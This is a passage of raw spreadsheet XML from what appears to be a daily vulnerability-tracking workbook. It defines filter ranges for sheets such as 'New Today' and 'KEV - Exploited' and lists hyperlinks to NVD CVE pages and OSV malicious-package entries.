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CVEs'!$A$1:$T$224</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'New Today'!$A$1:$T$223</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'Significant Updates'!$A$1:$T$1</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">'Added to KEV'!$A$1:$T$2</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">'KEV - Exploited'!$A$1:$T$2</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="6" hidden="1">'Critical &amp; High'!$A$1:$T$47</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="7" hidden="1">'Watchlist'!$A$1:$T$6</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="8" hidden="1">'Packages (GHSA-OSV)'!$A$1:$T$100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5207" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105209" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103355" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105215" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105086" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105089" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105210" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105213" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105211" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105293" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105220" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105208" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105212" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105219" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105295" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97307" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105216" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105218" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105221" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105222" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105223" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105294" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105147" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105148" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105149" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105158" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105166" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105167" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105169" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105170" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105172" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105175" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105182" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105183" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105184" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105185" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105229" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105230" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105231" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105232" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105238" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105246" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103062" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103344" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103354" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97276" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100727" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105306" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105141" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105165" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105168" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105171" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105180" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105181" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105186" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105187" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105233" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105292" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105302" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105174" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105224" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105144" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105145" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105161" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105163" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105205" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105206" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105137" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105146" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105176" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105177" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105178" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105226" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-104402" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105157" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105225" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105301" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105156" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105237" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105245" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105173" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105188" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105217" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105164" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105179" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-105214" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2017-20285" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2019-25777" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13607" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19954" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20519" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20520" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20521" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20522" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20523" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20524" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20525" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20526" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20527" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20528" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20529" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20530" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20531" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20532" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20533" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20534" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20535" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20536" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20537" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20538" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20539" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20540" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20541" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20542" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20543" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20544" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20579" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20586" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20587" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20588" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20589" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78371" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84169" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17343" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17383" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17404" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17405" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17472" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17473" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17474" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17475" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17476" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17477" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17478" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17479" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17480" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17481" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17482" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17483" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17484" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17485" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17486" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17487" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17488" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17489" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17490" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17491" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17492" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17493" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17494" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17495" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17496" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17497" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17498" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17499" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17500" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17501" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17502" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17503" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17504" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17505" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17506" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17507" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17508" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17509" TargetMode="External" 